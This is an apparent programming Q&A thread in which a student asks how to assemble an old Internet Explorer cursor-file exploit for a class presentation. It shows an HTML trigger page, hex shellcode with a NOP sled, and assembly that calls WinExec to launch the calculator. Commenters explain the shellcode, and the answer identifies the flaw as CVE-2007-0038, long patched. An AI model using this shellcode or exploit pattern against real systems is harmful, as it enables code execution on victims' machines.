# How can I setup this HEX Assembly?

Tags: javascript, assembly, memory

I will have a presentation in my class about phising. I found a very interesting presentation on the Internet (https://www.youtube.com/watch?v=iRpKdId5-lE)

On Internet Explorer 8 it should be work (WIN 7).

It should open the calculator.

And there is an x86 Assembly hex code what is need to be in the riff.htm, but he didn't show the riff.htm, so: How should I create the riff.htm?

Thanks for the help!

index.htm:

```
<script language="javascript">
document.write("<html><body style=\"cursor: url('riff.htm');\">   </body></html>");
wait(500);
window.location.reload();
</script>
```

It's should be on riff.htm:

HEX:

```
77d8af0a
90909090
90909090
90909090
90909090
90909090
90909090
90909090
90909090
90909090
2068ec8b
68202020
636c6163
50f8458d
86114db8
90d0ff7c
```

In x86Assembly (It has to be similar):

```
MOV EBP,ESP
PUSH 20202020
PUSH 636d6163
LEA EAX,DWORD PTR SS:[EBP-8]
PUSH EAX
MOV EAX,kernel32.WinExec
CALL EAX
```

Comment: The repeating `0x90` block is a "NOP sled" aka "NOP slide" that still works as long as execution starts anywhere in that range of addresses.  Other than that, not clear what you're asking.  Your question doesn't include enough detail about what exactly you're trying to create.  (And no I'm not going to go watch a couple youtube videos for context; it's up to you to make your question explain enough to be useful and answerable on its own, that's how Stack Overflow works.)

Comment: Sorry. Edited the question.

Comment: It sounds like `riff.htm` is just your exploit shellcode / payload, and should be the binary machine.  So hex-undump that hex back to binary.

Answer (score 1):

> On Internet Explorer 8 it should be work (WIN 7).

The vulnerability you're describing sounds like [CVE-2007-0038](https://www.cvedetails.com/cve/CVE-2007-0038/). This vulnerability was patched several years before Windows 7 was released -- Windows 7 systems were never affected.

In any case, it's unclear how this would be relevant to a presentation about phishing.